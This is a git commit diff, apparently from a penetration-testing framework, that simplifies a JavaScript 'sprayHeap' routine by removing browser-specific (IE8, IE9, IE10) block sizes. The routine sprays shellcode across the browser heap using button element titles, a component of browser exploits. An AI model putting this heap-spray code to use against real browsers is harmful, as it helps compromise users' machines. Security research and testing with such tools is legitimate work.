One size rules them all.

bug/bundler_fix
sinn3r 2013-02-28 11:21:23 -06:00
parent 722e077029
commit 8cb5da0794
1 changed files with 2 additions and 29 deletions

View File

@ -799,8 +799,6 @@ protected
# #
# The "sprayHeap" JavaScript function supports the following arguments: # The "sprayHeap" JavaScript function supports the following arguments:
# shellcode => The shellcode to spray in JavaScript. # shellcode => The shellcode to spray in JavaScript.
# browser => The type of browser to target for precise block size, such as:
# 'ie8', 'ie9', 'ie10', and 'generic'.
# objId => Optional. The ID for a <div> HTML tag. # objId => Optional. The ID for a <div> HTML tag.
# offset => Optional. Number of bytes to align the shellcode, default: 0x104 # offset => Optional. Number of bytes to align the shellcode, default: 0x104
# heapBlockSize => Optional. Allocation size, default: 0x80000 # heapBlockSize => Optional. Allocation size, default: 0x80000
@ -822,7 +820,6 @@ protected
function sprayHeap( oArg ) { function sprayHeap( oArg ) {
shellcode = oArg.shellcode; shellcode = oArg.shellcode;
browser = oArg.browser;
offset = oArg.offset; offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize; heapBlockSize = oArg.heapBlockSize;
maxAllocs = oArg.maxAllocs; maxAllocs = oArg.maxAllocs;
@ -832,7 +829,6 @@ protected
if (offset == undefined) { offset = 0x104; } if (offset == undefined) { offset = 0x104; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; } if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (browser == undefined) { browser = 'generic'; }
if (offset > 0x800) { throw "Bad alignment"; } if (offset > 0x800) { throw "Bad alignment"; }
@ -855,31 +851,8 @@ protected
for (var i = 0; i < maxAllocs; i++) for (var i = 0; i < maxAllocs; i++)
{ {
var obj = document.createElement("button"); var obj = document.createElement("button");
switch (browser)
{
case 'ie8':
obj.title = data.substring(0, (heapBlockSize-6)/2);
div_container.appendChild(obj);
break;
case 'ie9':
obj.title = data.substring(0, (heapBlockSize-2)/2); obj.title = data.substring(0, (heapBlockSize-2)/2);
div_container.appendChild(obj); div_container.appendChild(obj);
break;
case 'ie10':
obj.title = data.substring(0, (heapBlockSize-2)/2);
div_container.appendChild(obj);
break;
case 'generic':
obj.title = data.substring(0, (heapBlockSize-2)/2);
div_container.appendChild(obj);
break;
default:
throw "Invalid argument";
}
} }
} }
| |